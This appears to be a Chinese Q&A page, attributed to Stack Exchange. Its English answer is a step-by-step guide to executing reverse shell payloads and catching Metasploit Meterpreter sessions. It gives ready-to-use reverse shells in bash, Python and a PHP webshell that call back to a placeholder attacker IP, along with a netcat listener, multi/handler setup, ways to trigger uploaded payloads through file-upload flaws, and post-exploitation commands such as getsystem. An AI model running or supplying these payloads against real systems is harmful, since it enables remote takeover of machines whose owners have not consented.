如何执行反向Shell Payload?Metasploit Meterpreter场景下Payload执行咨询
Alright, let's break down your questions clearly—first covering how to run a reverse shell payload in general, then diving into getting that Meterpreter shell up and running via Metasploit after uploading your payload.
The way you execute a reverse shell depends entirely on the access you have to the target system and what tools/languages are available there:
Direct command line execution
If you already have command line access (via SSH, RCE, etc.), just paste the payload command matching the target OS and run it. For example, a common bash payload for Linux:bash -i >& /dev/tcp/[YOUR_LOCAL_IP]/[YOUR_LISTEN_PORT] 0>&1Before running this, make sure you're listening on your local machine with
nc -lvnp [YOUR_LISTEN_PORT]—once the payload runs, you'll get a shell session.Script-based execution
If the target allows running scripts (Python, PHP, etc.), save the payload as a script file and execute it with the appropriate interpreter. For a Python reverse shell:import socket, subprocess, os s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("[YOUR_LOCAL_IP]", [YOUR_LISTEN_PORT])) os.dup2(s.fileno(), 0) os.dup2(s.fileno(), 1) os.dup2(s.fileno(), 2) subprocess.call(["/bin/sh", "-i"])Save this as
rev_shell.py, then run it on the target withpython rev_shell.py.Web application trigger
If you uploaded a payload via a file upload vulnerability (like a PHP webshell), trigger it by accessing the file's URL in a browser or viacurl. For example, a PHP payload:<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/[YOUR_LOCAL_IP]/[YOUR_LISTEN_PORT] 0>&1'"); ?>Upload this as
rev_shell.php, then hithttp://target-ip/rev_shell.phpto kick off the reverse connection.
Once you've uploaded the Metasploit-generated payload to the target, follow these steps to get the Meterpreter shell working:
Set up the listener in Metasploit
Openmsfconsoleon your local machine and configure the handler to match the payload you generated:use exploit/multi/handler set PAYLOAD [YOUR_PAYLOAD_TYPE] # e.g., linux/x64/meterpreter/reverse_tcp or windows/x64/meterpreter/reverse_tcp set LHOST [YOUR_LOCAL_IP] set LPORT [YOUR_LISTEN_PORT] runMetasploit will now sit and wait for the target to connect.
Execute the payload on the target
How you run the payload depends on its type:- Executable files (e.g.,
.binfor Linux,.exefor Windows): Run it directly via the target's command line (./payload.binon Linux) or double-click it if you have GUI access on Windows. - Script payloads (e.g., PHP, Python): Use the target's interpreter to run the file—
php payload.phporpython payload.py. - Web-based payloads: Access the uploaded file's URL (e.g.,
http://target-ip/payload.aspx) to trigger execution.
- Executable files (e.g.,
Establish the Meterpreter session
As soon as the payload runs on the target, your local Metasploit listener will catch the connection, and you'll be dropped into a Meterpreter shell. From here, you can use commands likesysinfo,upload,download, orgetsystemto interact with the target.
Quick Notes to Avoid Headaches
- Make sure your local IP is reachable by the target (use a public IP if you're across networks, or set up port forwarding).
- Check that the target's firewall/security group allows outbound connections to your listen port.
- Always generate a payload that matches the target's OS and architecture (x86 vs x64)—a 64-bit payload won't run on a 32-bit system!
内容的提问来源于stack exchange,提问作者user2609980

